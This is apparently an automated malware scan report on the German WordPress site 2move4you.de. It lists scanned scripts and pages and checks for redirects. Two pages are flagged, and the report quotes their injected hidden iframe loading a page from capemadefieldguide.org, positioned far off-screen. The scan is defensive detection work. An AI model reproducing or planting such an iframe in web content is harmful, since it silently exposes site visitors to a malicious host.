Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=2move4you.de
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://2move4you.de/ | 200 OK Content-Length: 21144 Content-Type: text/html | malicious |
Page code contains blacklisted domain: capemadefieldguide.org <!DOCTYPE html> <!--[if IE 7]> <html class="ie ie7" lang="de-DE"> <![endif]--> <!--[if IE 8]> <html class="ie ie8" lang="de-DE"> <![endif]--> <!--[if !(IE 7) | !(IE 8) ]><!--> <html lang="de-DE"> <!--<![endif]--> <head> <!-- Basic Page Needs ================================================== --> <meta charset="UTF-8"& ...[4517 bytes skipped]... Malicious iFrame found. size: 443x66 src: http://capemadefieldguide.org/ram.html This URL is marked by Yandex as suspicious <iframe src="http://capemadefieldguide.org/ram.html" width="443" height="66" style="position:absolute;left:-77721px;"> | ||
http://2move4you.de/wp-includes/js/jquery/jquery.js?ver=1.8.3 | 200 OK Content-Length: 93658 Content-Type: application/javascript | clean |
http://2move4you.de/wp-content/themes/Aqua/js/jquery.easing.1.3.js?ver=3.5 | 200 OK Content-Length: 8097 Content-Type: application/javascript | clean |
http://2move4you.de/wp-content/themes/Aqua/js/aqua.common.js?ver=3.5 | 200 OK Content-Length: 5391 Content-Type: application/javascript | clean |
http://2move4you.de/wp-content/themes/Aqua/js/jquery.quicksand.js?ver=3.5 | 200 OK Content-Length: 14217 Content-Type: application/javascript | clean |
http://2move4you.de/wp-content/themes/Aqua/js/jquery.flexslider-min.js?ver=3.5 | 200 OK Content-Length: 16662 Content-Type: application/javascript | clean |
http://2move4you.de/wp-content/themes/Aqua/js/jquery.prettyPhoto.js?ver=3.5 | 200 OK Content-Length: 25216 Content-Type: application/javascript | clean |
http://2move4you.de/wp-content/themes/Aqua/js/jquery.jcarousel.min.js?ver=3.5 | 200 OK Content-Length: 15650 Content-Type: application/javascript | clean |
http://2move4you.de/wp-content/themes/Aqua/js/jquery.tipsy.js?ver=3.5 | 200 OK Content-Length: 7389 Content-Type: application/javascript | clean |
http://2move4you.de/wp-content/plugins/fancybox-for-wordpress/fancybox/jquery.fancybox.js?ver=1.3.4 | 200 OK Content-Length: 15667 Content-Type: application/javascript | clean |
http://2move4you.de/wp-content/plugins/revslider/rs-plugin/js/jquery.themepunch.plugins.min.js?ver=3.5 | 200 OK Content-Length: 17128 Content-Type: application/javascript | clean |
http://2move4you.de/wp-content/plugins/revslider/rs-plugin/js/jquery.themepunch.revolution.min.js?ver=3.5 | 200 OK Content-Length: 53923 Content-Type: application/javascript | clean |
http://2move4you.de/wp-content/plugins/dralis-tiled-gallery/js/rtg.js?ver=1.0 | 200 OK Content-Length: 16593 Content-Type: application/javascript | clean |
http://2move4you.de/wp-content/plugins/dralis-tiled-gallery/js/prettyphoto/js/jquery.prettyPhoto.js?ver=1.0 | 200 OK Content-Length: 22060 Content-Type: application/javascript | clean |
http://2move4you.de/?page_id=60 | 200 OK Content-Length: 15045 Content-Type: text/html | malicious |
Page code contains blacklisted domain: capemadefieldguide.org <!DOCTYPE html> <!--[if IE 7]> <html class="ie ie7" lang="de-DE"> <![endif]--> <!--[if IE 8]> <html class="ie ie8" lang="de-DE"> <![endif]--> <!--[if !(IE 7) | !(IE 8) ]><!--> <html lang="de-DE"> <!--<![endif]--> <head> <!-- Basic Page Needs ================================================== --> <meta charset="UTF-8"& ...[4517 bytes skipped]... Malicious iFrame found. size: 443x66 src: http://capemadefieldguide.org/ram.html This URL is marked by Yandex as suspicious <iframe src="http://capemadefieldguide.org/ram.html" width="443" height="66" style="position:absolute;left:-77721px;"> |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: 2move4you.de
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 07 Mar 2015 02:11:18 GMT
Server: Apache/2.4.10
Content-Type: text/html; charset=UTF-8
X-Pingback: http://2move4you.de/xmlrpc.php
X-Powered-By: PHP/5.5.14
GET / HTTP/1.1
Host: 2move4you.de
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 07 Mar 2015 02:11:18 GMT
Server: Apache/2.4.10
Content-Type: text/html; charset=UTF-8
X-Pingback: http://2move4you.de/xmlrpc.php
X-Powered-By: PHP/5.5.14
Second query (visit from search engine):
GET / HTTP/1.1
Host: 2move4you.de
Referer: http://www.google.com/search?q=2move4you.de
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: 2move4you.de
Referer: http://www.google.com/search?q=2move4you.de
Result:
The result is similar to the first query. There are no suspicious redirects found.